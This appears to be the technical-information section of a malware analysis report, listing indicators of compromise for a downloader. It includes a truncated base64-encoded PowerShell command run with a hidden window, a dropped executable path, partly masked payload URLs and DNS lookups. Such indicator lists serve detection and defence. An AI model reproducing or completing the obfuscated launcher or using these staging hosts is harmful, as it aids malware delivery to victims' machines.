Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAF8AcwAzADIAYQBhAD0AKAAoACcASgAnACsAJwBiAHEAaAAnACkAKwAnADEAJwArACcAaABhACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUATgBWADoAVABlAE0AUABcAHcAbwBSAGQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\tvq1013_e.exe
- %TEMP%\word\2019\tvq1013_e.exe
- http://ai#.##mahhost.com/wp-includes/WxONU/
- http://dw####eativos.com/cgi-bin/7/
- http://ti####pablus.net/cgi-bin/Z/
- http://op##no.com/wp-admin/6uGPi/
- http://www.op##no.com/wp-admin/6uGPi/
- DNS ASK sp###ypush.com
- DNS ASK ai#.##mahhost.com
- DNS ASK sa####afashion.com
- DNS ASK dw####eativos.com
- DNS ASK ti####pablus.net
- DNS ASK tu##usa.com
- DNS ASK op##no.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAF8AcwAzADIAYQBhAD0AKAAoACcASgAnACsAJwBiAHEAaAAnACkAKwAnADEAJwArACcAaABhACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUATgBWADoAVABlAE0AUABcAHcAbwBSAGQAXAAyADAAMQA5AF...' (with hidden window)